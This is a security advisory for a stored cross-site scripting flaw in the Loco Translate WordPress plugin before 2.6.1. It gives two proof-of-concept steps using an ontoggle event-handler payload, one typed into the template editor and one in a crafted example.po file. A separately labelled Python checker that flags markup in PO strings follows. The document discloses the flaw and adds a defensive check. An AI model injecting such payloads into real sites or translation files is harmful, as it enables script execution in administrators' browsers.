Loco Translate < 2.6.1 - Authenticated Stored Cross-Site Scripting

22 Mar 2022 00:00:00 | Reported by Taurus Omar | Type: wpexploit

Loco Translate Authenticated XSS via edit-template and example.p

## POC1: via (edit-template) 

1.) Go to the Loco Translate plugin
2.) Enter Plugins Options
3.) Enter Edit Template for any plugin
4.) Add New Message
5.) Edit Message
6.) Replace the message with the payload: ">'><details/open/ontoggle=alert('Yoho!')>
7.) Save
8.) Replicated


## POC2 via (example.po)

1.) Go to the Loco Translate plugin
2.) Enter Plugins Options for any plugin
3.) Upload PO options
4.) Load example.po

## Example.po
```
msgid ""
msgstr ""
"Project-Id-Version: xss-tester\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2022-02-25 03:48+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: \n"
"Language: \n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Loco https://localise.biz/\n"
"X-Loco-Version: 2.5.8; wp-5.9.1\n"
"X-Domain: xss-tester"
msgid "xss-tester"
msgstr ""
msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""
```
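A pre-import check that a site owner or reviewer could run over a PO file before loading it into the editor, as an added example (not code from the original advisory or from Loco Translate): it parses the `msgid`/`msgstr` strings and flags any that carry HTML tags or inline event handlers. The regex heuristic, the choice to skip the header entry, and all function names are assumptions; the sample input is constructed from the example.po above.

```python
import re

# One PO keyword line, e.g.  msgid "text"  or  msgstr[0] "text"
KEYWORD = re.compile(r'^(msgctxt|msgid_plural|msgid|msgstr(?:\[\d+\])?)\s+"(.*)"\s*$')
CONTINUATION = re.compile(r'^"(.*)"\s*$')
# Heuristic (assumption): an HTML-like tag or an inline event handler is suspicious.
MARKUP = re.compile(r'<\s*/?\s*[a-zA-Z][^>]*>|\bon[a-z]+\s*=', re.IGNORECASE)
ESCAPES = {'n': '\n', 't': '\t', 'r': '\r'}

def unescape(text):
    # Decode backslash escapes used inside PO strings; unknown ones keep the char.
    return re.sub(r'\\(.)', lambda m: ESCAPES.get(m.group(1), m.group(1)), text)

def parse_po(source):
    """Yield (line_number, keyword, decoded_string) for each string in a PO file."""
    current = None
    for number, line in enumerate(source.splitlines(), start=1):
        line = line.strip()
        keyword, more = KEYWORD.match(line), CONTINUATION.match(line)
        if keyword or not more:  # new keyword, blank line or comment ends a string
            if current:
                yield tuple(current)
            current = [number, keyword.group(1), unescape(keyword.group(2))] if keyword else None
        elif current:            # quoted continuation line of the current string
            current[2] += unescape(more.group(1))
    if current:
        yield tuple(current)

def find_markup(source):
    """Return the strings that contain markup, skipping the header entry."""
    hits, in_header = [], False
    for number, keyword, text in parse_po(source):
        if keyword == "msgid":
            # Assumption: the empty msgid is the header; its placeholders such as
            # <EMAIL@ADDRESS> look like tags and would be false positives.
            in_header = text == ""
        if not in_header and MARKUP.search(text):
            hits.append((number, keyword, text))
    return hits

# Constructed sample, shortened from the example.po shown above.
SAMPLE_PO = r'''msgid ""
msgstr ""
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
msgid "xss-tester"
msgstr ""
msgid "\">'><details/open/ontoggle=confirm('XSS')>"
msgstr ""
'''

if __name__ == "__main__":
    print(*find_markup(SAMPLE_PO), sep="\n")
```

This is a triage aid for uploaded translation files; per the advisory title, versions from 2.6.1 onward are not affected.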

Vulners AI Score: 0.1 (Low risk)
EPSS: 0.001